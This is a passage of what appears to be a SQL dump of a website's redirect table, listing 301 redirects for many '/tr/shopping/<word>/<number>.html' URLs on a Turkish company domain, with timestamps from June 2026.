00:00:00',301),(68783,'https://3s-technologies.com.tr/tr/shopping/serrata/2828935683.html',NULL,'https://3s-technologies.com.tr/shopping/serrata/2828935683.html','',1,0,'2026-06-11 00:32:14','0000-00-00 00:00:00',301),(68784,'https://3s-technologies.com.tr/tr/shopping/priggism/2521615485.html',NULL,'https://3s-technologies.com.tr/shopping/priggism/2521615485.html','',1,0,'2026-06-11 00:32:17','0000-00-00 00:00:00',301),(68785,'https://3s-technologies.com.tr/tr/shopping/flowerpot/819096362.html',NULL,'https://3s-technologies.com.tr/shopping/flowerpot/819096362.html','',1,0,'2026-06-11 00:32:20','0000-00-00 00:00:00',301),(68786,'https://3s-technologies.com.tr/tr/shopping/congenialness/2531187245.html',NULL,'https://3s-technologies.com.tr/shopping/congenialness/2531187245.html','',1,0,'2026-06-11 00:32:23','0000-00-00 00:00:00',301),(68787,'https://3s-technologies.com.tr/tr/shopping/prescriber/1513845323.html',NULL,'https://3s-technologies.com.tr/shopping/prescriber/1513845323.html','',1,0,'2026-06-11 00:32:26','0000-00-00 00:00:00',301),(68788,'https://3s-technologies.com.tr/tr/shopping/carcass/4085790830.html',NULL,'https://3s-technologies.com.tr/shopping/carcass/4085790830.html','',1,0,'2026-06-11 00:32:29','0000-00-00 00:00:00',301),(68789,'https://3s-technologies.com.tr/tr/shopping/conjugally/3049945458.html',NULL,'https://3s-technologies.com.tr/shopping/conjugally/3049945458.html','',1,0,'2026-06-11 00:32:32','0000-00-00 00:00:00',301),(68790,'https://3s-technologies.com.tr/tr/shopping/taciturnly/444552619.html',NULL,'https://3s-technologies.com.tr/shopping/taciturnly/444552619.html','',1,0,'2026-06-11 00:32:35','0000-00-00 00:00:00',301),(68791,'https://3s-technologies.com.tr/tr/shopping/clinometric/4199096831.html',NULL,'https://3s-technologies.com.tr/shopping/clinometric/4199096831.html','',1,0,'2026-06-11 00:32:38','0000-00-00 00:00:00',301),(68792,'https://3s-technologies.com.tr/tr/shopping/breloque/2758235930.html',NULL,'https://3s-technologies.com.tr/shopping/breloque/2758235930.html','',1,0,'2026-06-11 00:32:41','0000-00-00 00:00:00',301),(68793,'https://3s-technologies.com.tr/tr/shopping/trilithons/3434187061.html',NULL,'https://3s-technologies.com.tr/shopping/trilithons/3434187061.html','',1,0,'2026-06-11 00:32:44','0000-00-00 00:00:00',301),(68794,'https://3s-technologies.com.tr/tr/shopping/judaizing/4115861473.html',NULL,'https://3s-technologies.com.tr/shopping/judaizing/4115861473.html','',1,0,'2026-06-11 00:32:47','0000-00-00 00:00:00',301),(68795,'https://3s-technologies.com.tr/tr/shopping/bubbler/1906185563.html',NULL,'https://3s-technologies.com.tr/shopping/bubbler/1906185563.html','',1,0,'2026-06-11 00:32:50','0000-00-00 00:00:00',301),(68796,'https://3s-technologies.com.tr/tr/shopping/analogic/2335217898.html',NULL,'https://3s-technologies.com.tr/shopping/analogic/2335217898.html','',1,0,'2026-06-11 00:32:53','0000-00-00 00:00:00',301),(68797,'https://3s-technologies.com.tr/tr/shopping/phragmosiphon/2266519228.html',NULL,'https://3s-technologies.com.tr/shopping/phragmosiphon/2266519228.html','',1,0,'2026-06-11 00:32:56','0000-00-00 00:00:00',301),(68798,'https://3s-technologies.com.tr/tr/shopping/clancularly/3652872157.html',NULL,'https://3s-technologies.com.tr/shopping/clancularly/3652872157.html','',1,0,'2026-06-11 00:32:59','0000-00-00 00:00:00',301),(68799,'https://3s-technologies.com.tr/tr/shopping/prelatize/957509929.html',NULL,'https://3s-technologies.com.tr/shopping/prelatize/957509929.html','',1,0,'2026-06-11 00:33:02','0000-00-00 00:00:00',301),(68800,'https://3s-technologies.com.tr/tr/shopping/permanganic/2388184874.html',NULL,'https://3s-technologies.com.tr/shopping/permanganic/2388184874.html','',1,0,'2026-06-11 00:33:05','0000-00-00 00:00:00',301),(68801,'https://3s-technologies.com.tr/tr/shopping/oblongness/3213843063.html',NULL,'https://3s-technologies.com.tr/shopping/oblongness/3213843063.html','',1,0,'2026-06-11 00:33:08','0000-00-00 00:00:00',301),(68802,'https://3s-technologies.com.tr/tr/shopping/massively/980829409.html',NULL,'https://3s-technologies.com.tr/shopping/massively/980829409.html','',1,0,'2026-06-11 00:33:11','0000-00-00 00:00:00',301),(68803,'https://3s-technologies.com.tr/tr/shopping/gradus/534555617.html',NULL,'https://3s-technologies.com.tr/shopping/gradus/534555617.html','',1,0,'2026-06-11 00:33:14','0000-00-00 00:00:00',301),(68804,'https://3s-technologies.com.tr/tr/shopping/disclaimed/249763006.html',NULL,'https://3s-technologies.com.tr/shopping/disclaimed/249763006.html','',1,0,'2026-06-11 00:33:17','0000-00-00 00:00:00',301),(68805,'https://3s-technologies.com.tr/tr/shopping/maladroitly/10022571.html',NULL,'https://3s-technologies.com.tr/shopping/maladroitly/10022571.html','',1,0,'2026-06-11 00:33:20','0000-00-00 00:00:00',301),(68806,'https://3s-technologies.com.tr/tr/shopping/transactions/4238739234.html',NULL,'https://3s-technologies.com.tr/shopping/transactions/4238739234.html','',1,0,'2026-06-11 00:33:23','0000-00-00 00:00:00',301),(68807,'https://3s-technologies.com.tr/tr/shopping/meint/3502299877.html',NULL,'https://3s-technologies.com.tr/shopping/meint/3502299877.html','',1,0,'2026-06-11 00:33:32','0000-00-00 00:00:00',301),(68808,'https://3s-technologies.com.tr/tr/shopping/ashen/3272128235.html',NULL,'https://3s-technologies.com.tr/shopping/ashen/3272128235.html','',1,0,'2026-06-11 00:33:35','0000-00-00 00:00:00',301),(68809,'https://3s-technologies.com.tr/tr/shopping/tigrine/595150890.html',NULL,'https://3s-technologies.com.tr/shopping/tigrine/595150890.html','',1,0,'2026-06-11 00:33:38','0000-00-00 00:00:00',301),(68810,'https://3s-technologies.com.tr/tr/shopping/trackscout/1077805845.html',NULL,'https://3s-technologies.com.tr/shopping/trackscout/1077805845.html','',1,0,'2026-06-11 00:33:41','0000-00-00 00:00:00',301),(68811,'https://3s-technologies.com.tr/tr/shopping/archipallium/2164798960.html',NULL,'https://3s-technologies.com.tr/shopping/archipallium/2164798960.html','',1,0,'2026-06-11 00:33:44','0000-00-00 00:00:00',301),(68812,'https://3s-technologies.com.tr/tr/shopping/shredded/2361488737.html',NULL,'https://3s-technologies.com.tr/shopping/shredded/2361488737.html','',1,0,'2026-06-11 00:33:47','0000-00-00 00:00:00',301),(68813,'https://3s-technologies.com.tr/tr/shopping/ulonata/3893639615.html',NULL,'https://3s-technologies.com.tr/shopping/ulonata/3893639615.html','',1,0,'2026-06-11 00:33:50','0000-00-00 00:00:00',301),(68814,'https://3s-technologies.com.tr/tr/shopping/dragonish/3630323349.html',NULL,'https://3s-technologies.com.tr/shopping/dragonish/3630323349.html','',1,0,'2026-06-11 00:33:53','0000-00-00 00:00:00',301),(68815,'https://3s-technologies.com.tr/tr/shopping/ponderability/3069888217.html',NULL,'https://3s-technologies.com.tr/shopping/ponderability/3069888217.html','',1,0,'2026-06-11 00:33:56','0000-00-00 00:00:00',301),(68816,'https://3s-technologies.com.tr/tr/shopping/fussier/2555066251.html',NULL,'https://3s-technologies.com.tr/shopping/fussier/2555066251.html','',1,0,'2026-06-11 00:33:59','0000-00-00 00:00:00',301),(68817,'https://3s-technologies.com.tr/tr/shopping/dissuading/133504831.html',NULL,'https://3s-technologies.com.tr/shopping/dissuading/133504831.html','',1,0,'2026-06-11 00:34:01','0000-00-00 00:00:00',301),(68818,'https://3s-technologies.com.tr/tr/shopping/foreknew/2834669432.html',NULL,'https://3s-technologies.com.tr/shopping/foreknew/2834669432.html','',1,0,'2026-06-11 00:34:05','0000-00-00 00:00:00',301),(68819,'https://3s-technologies.com.tr/tr/shopping/stuprum/2145532582.html',NULL,'https://3s-technologies.com.tr/shopping/stuprum/2145532582.html','',1,0,'2026-06-11 00:34:08','0000-00-00 00:00:00',301),(68820,'https://3s-technologies.com.tr/tr/shopping/epacris/1616247225.html',NULL,'https://3s-technologies.com.tr/shopping/epacris/1616247225.html','',1,0,'2026-06-11 00:34:11','0000-00-00 00:00:00',301),(68821,'https://3s-technologies.com.tr/tr/shopping/pseudonyme/1171349071.html',NULL,'https://3s-technologies.com.tr/shopping/pseudonyme/1171349071.html','',1,0,'2026-06-11 00:34:14','0000-00-00 00:00:00',301),(68822,'https://3s-technologies.com.tr/tr/shopping/schemist/2236282863.html',NULL,'https://3s-technologies.com.tr/shopping/schemist/2236282863.html','',1,0,'2026-06-11 00:34:17','0000-00-00 00:00:00',301),(68823,'https://3s-technologies.com.tr/tr/shopping/harpins/1714590804.html',NULL,'https://3s-technologies.com.tr/shopping/harpins/1714590804.html','',1,0,'2026-06-11 00:34:19','0000-00-00 00:00:00',301),(68824,'https://3s-technologies.com.tr/tr/shopping/amuletic/3437401011.html',NULL,'https://3s-technologies.com.tr/shopping/amuletic/3437401011.html','',1,0,'2026-06-11 00:34:23','0000-00-00 00:00:00',301),(68825,'https://3s-technologies.com.tr/tr/shopping/anguis/891235457.html',NULL,'https://3s-technologies.com.tr/shopping/anguis/891235457.html','',1,0,'2026-06-11 00:34:26','0000-00-00 00:00:00',301),(68826,'https://3s-technologies.com.tr/tr/shopping/phyllopoda/697430716.html',NULL,'https://3s-technologies.com.tr/shopping/phyllopoda/697430716.html','',1,0,'2026-06-11 00:34:29','0000-00-00 00:00:00',301),(68827,'https://3s-technologies.com.tr/tr/shopping/sphenographic/3820825482.html',NULL,'https://3s-technologies.com.tr/shopping/sphenographic/3820825482.html','',1,0,'2026-06-11 00:34:32','0000-00-00 00:00:00',301),(68828,'https://3s-technologies.com.tr/tr/shopping/bolstering/3869367193.html',NULL,'https://3s-technologies.com.tr/shopping/bolstering/3869367193.html','',1,0,'2026-06-11 00:34:35','0000-00-00 00:00:00',301),(68829,'https://3s-technologies.com.tr/tr/shopping/lookdown/2139961572.html',NULL,'https://3s-technologies.com.tr/shopping/lookdown/2139961572.html','',1,0,'2026-06-11 00:34:38','0000-00-00 00:00:00',301),(68830,'https://3s-technologies.com.tr/tr/shopping/hastata/4040018643.html',NULL,'https://3s-technologies.com.tr/shopping/hastata/4040018643.html','',1,0,'2026-06-11 00:34:41','0000-00-00 00:00:00',301),(68831,'https://3s-technologies.com.tr/tr/shopping/inaptly/2761612635.html',NULL,'https://3s-technologies.com.tr/shopping/inaptly/2761612635.html','',1,0,'2026-06-11 00:34:44','0000-00-00 00:00:00',301),(68832,'https://3s-technologies.com.tr/tr/shopping/disadvantageously/3360903037.html',NULL,'https://3s-technologies.com.tr/shopping/disadvantageously/3360903037.html','',1,0,'2026-06-11 00:34:47','0000-00-00 00:00:00',301),(68833,'https://3s-technologies.com.tr/tr/shopping/creamcups/3902980698.html',NULL,'https://3s-technologies.com.tr/shopping/creamcups/3902980698.html','',1,0,'2026-06-11 00:34:50','0000-00-00 00:00:00',301),(68834,'https://3s-technologies.com.tr/tr/shopping/shorer/887858768.html',NULL,'https://3s-technologies.com.tr/shopping/shorer/887858768.html','',1,0,'2026-06-11 00:34:53','0000-00-00 00:00:00',301),(68835,'https://3s-technologies.com.tr/tr/shopping/kayles/4063501646.html',NULL,'https://3s-technologies.com.tr/shopping/kayles/4063501646.html','',1,0,'2026-06-11 00:34:56','0000-00-00 00:00:00',301),(68836,'https://3s-technologies.com.tr/tr/shopping/michigander/4165224517.html',NULL,'https://3s-technologies.com.tr/shopping/michigander/4165224517.html','',1,0,'2026-06-11 00:34:59','0000-00-00 00:00:00',301),(68837,'https://3s-technologies.com.tr/tr/shopping/apophyge/1767935519.html',NULL,'https://3s-technologies.com.tr/shopping/apophyge/1767935519.html','',1,0,'2026-06-11 00:35:07','0000-00-00 00:00:00',301),(68838,'https://3s-technologies.com.tr/tr/shopping/philopolemic/3874349381.html',NULL,'https://3s-technologies.com.tr/shopping/philopolemic/3874349381.html','',1,0,'2026-06-11 00:35:10','0000-00-00 00:00:00',301),(68839,'https://3s-technologies.com.tr/tr/shopping/disincorporated/3620768066.html',NULL,'https://3s-technologies.com.tr/shopping/disincorporated/3620768066.html','',1,0,'2026-06-11 00:35:13','0000-00-00 00:00:00',301),(68840,'https://3s-technologies.com.tr/tr/shopping/idiosyncrasies/54582627.html',NULL,'https://3s-technologies.com.tr/shopping/idiosyncrasies/54582627.html','',1,0,'2026-06-11 00:35:16','0000-00-00 00:00:00',301),(68841,'https://3s-technologies.com.tr/tr/shopping/besotted/2931474650.html',NULL,'https://3s-technologies.com.tr/shopping/besotted/2931474650.html','',1,0,'2026-06-11 00:35:19','0000-00-00 00:00:00',301),(68842,'https://3s-technologies.com.tr/tr/shopping/curium/695266126.html',NULL,'https://3s-technologies.com.tr/shopping/curium/695266126.html','',1,0,'2026-06-11 00:35:22','0000-00-00 00:00:00',301),(68843,'https://3s-technologies.com.tr/tr/shopping/landward/2333842276.html',NULL,'https://3s-technologies.com.tr/shopping/landward/2333842276.html','',1,0,'2026-06-11 00:35:25','0000-00-00 00:00:00',301),(68844,'https://3s-technologies.com.tr/tr/shopping/ambries/436327534.html',NULL,'https://3s-technologies.com.tr/shopping/ambries/436327534.html','',1,0,'2026-06-11 00:35:28','0000-00-00 00:00:00',301),(68845,'https://3s-technologies.com.tr/tr/shopping/opentide/3097143912.html',NULL,'https://3s-technologies.com.tr/shopping/opentide/3097143912.html','',1,0,'2026-06-11 00:35:31','0000-00-00 00:00:00',301),(68846,'https://3s-technologies.com.tr/tr/shopping/zymologist/4161847828.html',NULL,'https://3s-technologies.com.tr/shopping/zymologist/4161847828.html','',1,0,'2026-06-11 00:35:34','0000-00-00 00:00:00',301),(68847,'https://3s-technologies.com.tr/tr/shopping/foetens/1038990123.html',NULL,'https://3s-technologies.com.tr/shopping/foetens/1038990123.html','',1,0,'2026-06-11 00:35:38','0000-00-00 00:00:00',301),(68848,'https://3s-technologies.com.tr/tr/shopping/embryonary/2415485977.html',NULL,'https://3s-technologies.com.tr/shopping/embryonary/2415485977.html','',1,0,'2026-06-11 00:35:43','0000-00-00 00:00:00',301),(68849,'https://3s-technologies.com.tr/tr/shopping/tegument/1151617861.html',NULL,'https://3s-technologies.com.tr/shopping/tegument/1151617861.html','',1,0,'2026-06-11 00:35:46','0000-00-00 00:00:00',301),(68850,'https://3s-technologies.com.tr/tr/shopping/micrastur/1799614264.html',NULL,'https://3s-technologies.com.tr/shopping/micrastur/1799614264.html','',1,0,'2026-06-11 00:35:49','0000-00-00 00:00:00',301),(68851,'https://3s-technologies.com.tr/tr/shopping/formicivorus/863752519.html',NULL,'https://3s-technologies.com.tr/shopping/formicivorus/863752519.html','',1,0,'2026-06-11 00:35:52','0000-00-00 00:00:00',301),(68852,'https://3s-technologies.com.tr/tr/shopping/coccidae/1698284326.html',NULL,'https://3s-technologies.com.tr/shopping/coccidae/1698284326.html','',1,0,'2026-06-11 00:35:55','0000-00-00 00:00:00',301),(68853,'https://3s-technologies.com.tr/tr/shopping/megafarad/170543503.html',NULL,'https://3s-technologies.com.tr/shopping/megafarad/170543503.html','',1,0,'2026-06-11 00:35:58','0000-00-00 00:00:00',301),(68854,'https://3s-technologies.com.tr/tr/shopping/nubecula/3942788475.html',NULL,'https://3s-technologies.com.tr/shopping/nubecula/3942788475.html','',1,0,'2026-06-11 00:36:01','0000-00-00 00:00:00',301),(68855,'https://3s-technologies.com.tr/tr/shopping/coction/3433042100.html',NULL,'https://3s-technologies.com.tr/shopping/coction/3433042100.html','',1,0,'2026-06-11 00:36:04','0000-00-00 00:00:00',301),(68856,'https://3s-technologies.com.tr/tr/shopping/threestoreyed/201221295.html',NULL,'https://3s-technologies.com.tr/shopping/threestoreyed/201221295.html','',1,0,'2026-06-11 00:36:07','0000-00-00 00:00:00',301),(68857,'https://3s-technologies.com.tr/tr/shopping/dynasties/4168860830.html',NULL,'https://3s-technologies.com.tr/shopping/dynasties/4168860830.html','',1,0,'2026-06-11 00:36:16','0000-00-00 00:00:00',301),(68858,'https://3s-technologies.com.tr/tr/shopping/intractableness/2991227821.html',NULL,'https://3s-technologies.com.tr/shopping/intractableness/2991227821.html','',1,0,'2026-06-11 00:36:20','0000-00-00 00:00:00',301),(68859,'https://3s-technologies.com.tr/tr/shopping/sulphurated/2259602311.html',NULL,'https://3s-technologies.com.tr/shopping/sulphurated/2259602311.html','',1,0,'2026-06-11 00:36:23','0000-00-00 00:00:00',301),(68860,'https://3s-technologies.com.tr/tr/shopping/nepotal/372640767.html',NULL,'https://3s-technologies.com.tr/shopping/nepotal/372640767.html','',1,0,'2026-06-11 00:36:26','0000-00-00 00:00:00',301),(68861,'https://3s-technologies.com.tr/tr/shopping/potboiler/2926594210.html',NULL,'https://3s-technologies.com.tr/shopping/potboiler/2926594210.html','',1,0,'2026-06-11 00:36:30','0000-00-00 00:00:00',301),(68862,'https://3s-technologies.com.tr/tr/shopping/crottal/285115625.html',NULL,'https://3s-technologies.com.tr/shopping/crottal/285115625.html','',1,0,'2026-06-11 00:36:32','0000-00-00 00:00:00',301),(68863,'https://3s-technologies.com.tr/tr/shopping/enrace/3578372568.html',NULL,'https://3s-technologies.com.tr/shopping/enrace/3578372568.html','',1,0,'2026-06-11 00:36:35','0000-00-00 00:00:00',301),(68864,'https://3s-technologies.com.tr/tr/shopping/underpoise/4127069831.html',NULL,'https://3s-technologies.com.tr/shopping/underpoise/4127069831.html','',1,0,'2026-06-11 00:36:38','0000-00-00 00:00:00',301),(68865,'https://3s-technologies.com.tr/tr/shopping/spinetailed/3413560049.html',NULL,'https://3s-technologies.com.tr/shopping/spinetailed/3413560049.html','',1,0,'2026-06-11 00:36:41','0000-00-00 00:00:00',301),(68866,'https://3s-technologies.com.tr/tr/shopping/impedible/1357785018.html',NULL,'https://3s-technologies.com.tr/shopping/impedible/1357785018.html','',1,0,'2026-06-11 00:36:45','0000-00-00 00:00:00',301),(68867,'https://3s-technologies.com.tr/tr/shopping/amphipodous/1129548073.html',NULL,'https://3s-technologies.com.tr/shopping/amphipodous/1129548073.html','',1,0,'2026-06-11 00:36:48','0000-00-00 00:00:00',301),(68868,'https://3s-technologies.com.tr/tr/shopping/rhypticus/3702334299.html',NULL,'https://3s-technologies.com.tr/shopping/rhypticus/3702334299.html','',1,0,'2026-06-11 00:36:50','0000-00-00 00:00:00',301),(68869,'https://3s-technologies.com.tr/tr/shopping/midwest/2910451239.html',NULL,'https://3s-technologies.com.tr/shopping/midwest/2910451239.html','',1,0,'2026-06-11 00:36:53','0000-00-00 00:00:00',301),(68870,'https://3s-technologies.com.tr/tr/shopping/diplanar/4014799409.html',NULL,'https://3s-technologies.com.tr/shopping/diplanar/4014799409.html','',1,0,'2026-06-11 00:36:56','0000-00-00 00:00:00',301),(68871,'https://3s-technologies.com.tr/tr/shopping/crambo/1812380095.html',NULL,'https://3s-technologies.com.tr/shopping/crambo/1812380095.html','',1,0,'2026-06-11 00:37:00','0000-00-00 00:00:00',301),(68872,'https://3s-technologies.com.tr/tr/shopping/wastorel/1385003152.html',NULL,'https://3s-technologies.com.tr/shopping/wastorel/1385003152.html','',1,0,'2026-06-11 00:37:02','0000-00-00 00:00:00',301),(68873,'https://3s-technologies.com.tr/tr/shopping/lexiconist/1016313186.html',NULL,'https://3s-technologies.com.tr/shopping/lexiconist/1016313186.html','',1,0,'2026-06-11 00:37:05','0000-00-00 00:00:00',301),(68874,'https://3s-technologies.com.tr/tr/shopping/nonporous/467660486.html',NULL,'https://3s-technologies.com.tr/shopping/nonporous/467660486.html','',1,0,'2026-06-11 00:37:08','0000-00-00 00:00:00',301),(68875,'https://3s-technologies.com.tr/tr/shopping/tertiate/2559261623.html',NULL,'https://3s-technologies.com.tr/shopping/tertiate/2559261623.html','',1,0,'2026-06-11 00:37:12','0000-00-00 00:00:00',301),(68876,'https://3s-technologies.com.tr/tr/shopping/innavigably/2688126881.html',NULL,'https://3s-technologies.com.tr/shopping/innavigably/2688126881.html','',1,0,'2026-06-11 00:37:17','0000-00-00 00:00:00',301),(68877,'https://3s-technologies.com.tr/tr/shopping/theologics/621584452.html',NULL,'https://3s-technologies.com.tr/shopping/theologics/621584452.html','',1,0,'2026-06-11 00:37:21','0000-00-00 00:00:00',301),(68878,'https://3s-technologies.com.tr/tr/shopping/stoic/230079839.html',NULL,'https://3s-technologies.com.tr/shopping/stoic/230079839.html','',1,0,'2026-06-11 00:37:24','0000-00-00 00:00:00',301),(68879,'https://3s-technologies.com.tr/tr/shopping/paleotherium/2373254034.html',NULL,'https://3s-technologies.com.tr/shopping/paleotherium/2373254034.html','',1,0,'2026-06-11 00:37:27','0000-00-00 00:00:00',301),(68880,'https://3s-technologies.com.tr/tr/shopping/subcarbureted/1121547234.html',NULL,'https://3s-technologies.com.tr/shopping/subcarbureted/1121547234.html','',1,0,'2026-06-11 00:37:30','0000-00-00 00:00:00',301),(68881,'https://3s-technologies.com.tr/tr/shopping/podophthalmite/1485937071.html',NULL,'https://3s-technologies.com.tr/shopping/podophthalmite/1485937071.html','',1,0,'2026-06-11 00:37:33','0000-00-00 00:00:00',301),(68882,'https://3s-technologies.com.tr/tr/shopping/syndicalist/315873955.html',NULL,'https://3s-technologies.com.tr/shopping/syndicalist/315873955.html','',1,0,'2026-06-11 00:37:36','0000-00-00 00:00:00',301),(68883,'https://3s-technologies.com.tr/tr/shopping/glasssnail/3781151513.html',NULL,'https://3s-technologies.com.tr/shopping/glasssnail/3781151513.html','',1,0,'2026-06-11 00:37:39','0000-00-00 00:00:00',301),(68884,'https://3s-technologies.com.tr/tr/shopping/inaccessibleness/2998797730.html',NULL,'https://3s-technologies.com.tr/shopping/inaccessibleness/2998797730.html','',1,0,'2026-06-11 00:37:43','0000-00-00 00:00:00',301),(68885,'https://3s-technologies.com.tr/tr/shopping/heterogonously/4050571857.html',NULL,'https://3s-technologies.com.tr/shopping/heterogonously/4050571857.html','',1,0,'2026-06-11 00:37:45','0000-00-00 00:00:00',301),(68886,'https://3s-technologies.com.tr/tr/shopping/mouzle/1764395307.html',NULL,'https://3s-technologies.com.tr/shopping/mouzle/1764395307.html','',1,0,'2026-06-11 00:37:48','0000-00-00 00:00:00',301),(68887,'https://3s-technologies.com.tr/tr/shopping/stokey/1536134507.html',NULL,'https://3s-technologies.com.tr/shopping/stokey/1536134507.html','',1,0,'2026-06-11 00:37:51','0000-00-00 00:00:00',301),(68888,'https://3s-technologies.com.tr/tr/shopping/angevine/1758430897.html',NULL,'https://3s-technologies.com.tr/shopping/angevine/1758430897.html','',1,0,'2026-06-11 00:37:54','0000-00-00 00:00:00',301),(68889,'https://3s-technologies.com.tr/tr/shopping/weregeld/3771973953.html',NULL,'https://3s-technologies.com.tr/shopping/weregeld/3771973953.html','',1,0,'2026-06-11 00:37:57','0000-00-00 00:00:00',301),(68890,'https://3s-technologies.com.tr/tr/shopping/eschericia/1390967546.html',NULL,'https://3s-technologies.com.tr/shopping/eschericia/1390967546.html','',1,0,'2026-06-11 00:38:00','0000-00-00 00:00:00',301),(68891,'https://3s-technologies.com.tr/tr/shopping/herie/1547292655.html',NULL,'https://3s-technologies.com.tr/shopping/herie/1547292655.html','',1,0,'2026-06-11 00:38:03','0000-00-00 00:00:00',301),(68892,'https://3s-technologies.com.tr/tr/shopping/appreciatorily/2969677363.html',NULL,'https://3s-technologies.com.tr/shopping/appreciatorily/2969677363.html','',1,0,'2026-06-11 00:38:06','0000-00-00 00:00:00',301),(68893,'https://3s-technologies.com.tr/tr/shopping/unspike/2050940028.html',NULL,'https://3s-technologies.com.tr/shopping/unspike/2050940028.html','',1,0,'2026-06-11 00:38:09','0000-00-00 00:00:00',301),(68894,'https://3s-technologies.com.tr/tr/shopping/irishamerican/3473994822.html',NULL,'https://3s-technologies.com.tr/shopping/irishamerican/3473994822.html','',1,0,'2026-06-11 00:38:12','0000-00-00 00:00:00',301),(68895,'https://3s-technologies.com.tr/tr/shopping/sconcheon/161068902.html',NULL,'https://3s-technologies.com.tr/shopping/sconcheon/161068902.html','',1,0,'2026-06-11 00:38:16','0000-00-00 00:00:00',301),(68896,'https://3s-technologies.com.tr/tr/shopping/deadness/2862576914.html',NULL,'https://3s-technologies.com.tr/shopping/deadness/2862576914.html','',1,0,'2026-06-11 00:38:19','0000-00-00 00:00:00',301),(68897,'https://3s-technologies.com.tr/tr/shopping/killikinick/3063462079.html',NULL,'https://3s-technologies.com.tr/shopping/killikinick/3063462079.html','',1,0,'2026-06-11 00:38:21','0000-00-00 00:00:00',301),(68898,'https://3s-technologies.com.tr/tr/shopping/trigamous/478867418.html',NULL,'https://3s-technologies.com.tr/shopping/trigamous/478867418.html','',1,0,'2026-06-11 00:38:25','0000-00-00 00:00:00',301),(68899,'https://3s-technologies.com.tr/tr/shopping/seafaring/728743802.html',NULL,'https://3s-technologies.com.tr/shopping/seafaring/728743802.html','',1,0,'2026-06-11 00:38:28','0000-00-00 00:00:00',301),(68900,'https://3s-technologies.com.tr/tr/shopping/chartreux/4239489573.html',NULL,'https://3s-technologies.com.tr/shopping/chartreux/4239489573.html','',1,0,'2026-06-11 00:38:30','0000-00-00 00:00:00',301),(68901,'https://3s-technologies.com.tr/tr/shopping/clivers/2105773605.html',NULL,'https://3s-technologies.com.tr/shopping/clivers/2105773605.html','',1,0,'2026-06-11 00:38:33','0000-00-00 00:00:00',301),(68902,'https://3s-technologies.com.tr/tr/shopping/seduced/2331215942.html',NULL,'https://3s-technologies.com.tr/shopping/seduced/2331215942.html','',1,0,'2026-06-11 00:38:37','0000-00-00 00:00:00',301),(68903,'https://3s-technologies.com.tr/tr/shopping/mistrustfulness/410364652.html',NULL,'https://3s-technologies.com.tr/shopping/mistrustfulness/410364652.html','',1,0,'2026-06-11 00:38:40','0000-00-00 00:00:00',301),(68904,'https://3s-technologies.com.tr/tr/shopping/didelphic/439338548.html',NULL,'https://3s-technologies.com.tr/shopping/didelphic/439338548.html','',1,0,'2026-06-11 00:38:45','0000-00-00 00:00:00',301),(68905,'https://3s-technologies.com.tr/tr/shopping/deeprooted/1890564749.html',NULL,'https://3s-technologies.com.tr/shopping/deeprooted/1890564749.html','',1,0,'2026-06-11 00:38:47','0000-00-00 00:00:00',301),(68906,'https://3s-technologies.com.tr/tr/shopping/paramiographer/1434736629.html',NULL,'https://3s-technologies.com.tr/shopping/paramiographer/1434736629.html','',1,0,'2026-06-11 00:38:49','0000-00-00 00:00:00',301),(68907,'https://3s-technologies.com.tr/tr/shopping/dirked/3206627941.html',NULL,'https://3s-technologies.com.tr/shopping/dirked/3206627941.html','',1,0,'2026-06-11 00:38:52','0000-00-00 00:00:00',301),(68908,'https://3s-technologies.com.tr/tr/shopping/prelusive/296941143.html',NULL,'https://3s-technologies.com.tr/shopping/prelusive/296941143.html','',1,0,'2026-06-11 00:38:55','0000-00-00 00:00:00',301),(68909,'https://3s-technologies.com.tr/tr/shopping/breech/3743560803.html',NULL,'https://3s-technologies.com.tr/shopping/breech/3743560803.html','',1,0,'2026-06-11 00:38:58','0000-00-00 00:00:00',301),(68910,'https://3s-technologies.com.tr/tr/shopping/cothurn/1133081084.html',NULL,'https://3s-technologies.com.tr/shopping/cothurn/1133081084.html','',1,0,'2026-06-11 00:39:01','0000-00-00 00:00:00',301),(68911,'https://3s-technologies.com.tr/tr/shopping/stimulative/4174480624.html',NULL,'https://3s-technologies.com.tr/shopping/stimulative/4174480624.html','',1,0,'2026-06-11 00:39:04','0000-00-00 00:00:00',301),(68912,'https://3s-technologies.com.tr/tr/shopping/servitor/1738007079.html',NULL,'https://3s-technologies.com.tr/shopping/servitor/1738007079.html','',1,0,'2026-06-11 00:39:08','0000-00-00 00:00:00',301),(68913,'https://3s-technologies.com.tr/tr/shopping/posttympanic/4022971530.html',NULL,'https://3s-technologies.com.tr/shopping/posttympanic/4022971530.html','',1,0,'2026-06-11 00:39:10','0000-00-00 00:00:00',301),(68914,'https://3s-technologies.com.tr/tr/shopping/readjourn/4056304804.html',NULL,'https://3s-technologies.com.tr/shopping/readjourn/4056304804.html','',1,0,'2026-06-11 00:39:13','0000-00-00 00:00:00',301),(68915,'https://3s-technologies.com.tr/tr/shopping/headmost/4285638496.html',NULL,'https://3s-technologies.com.tr/shopping/headmost/4285638496.html','',1,0,'2026-06-11 00:39:17','0000-00-00 00:00:00',301),(68916,'https://3s-technologies.com.tr/tr/shopping/protosulphuret/75899019.html',NULL,'https://3s-technologies.com.tr/shopping/protosulphuret/75899019.html','',1,0,'2026-06-11 00:39:20','0000-00-00 00:00:00',301),(68917,'https://3s-technologies.com.tr/tr/shopping/karagane/863667511.html',NULL,'https://3s-technologies.com.tr/shopping/karagane/863667511.html','',1,0,'2026-06-11 00:39:23','0000-00-00 00:00:00',301),(68918,'https://3s-technologies.com.tr/tr/shopping/trotted/2955268648.html',NULL,'https://3s-technologies.com.tr/shopping/trotted/2955268648.html','',1,0,'2026-06-11 00:39:26','0000-00-00 00:00:00',301),(68919,'https://3s-technologies.com.tr/tr/shopping/visibility/2225414344.html',NULL,'https://3s-technologies.com.tr/shopping/visibility/2225414344.html','',1,0,'2026-06-11 00:39:29','0000-00-00 00:00:00',301),(68920,'https://3s-technologies.com.tr/tr/shopping/electrotyped/649801880.html',NULL,'https://3s-technologies.com.tr/shopping/electrotyped/649801880.html','',1,0,'2026-06-11 00:39:32','0000-00-00 00:00:00',301),(68921,'https://3s-technologies.com.tr/tr/shopping/inconceivability/3262471815.html',NULL,'https://3s-technologies.com.tr/shopping/inconceivability/3262471815.html','',1,0,'2026-06-11 00:39:35','0000-00-00 00:00:00',301),(68922,'https://3s-technologies.com.tr/tr/shopping/eraser/3890635542.html',NULL,'https://3s-technologies.com.tr/shopping/eraser/3890635542.html','',1,0,'2026-06-11 00:39:38','0000-00-00 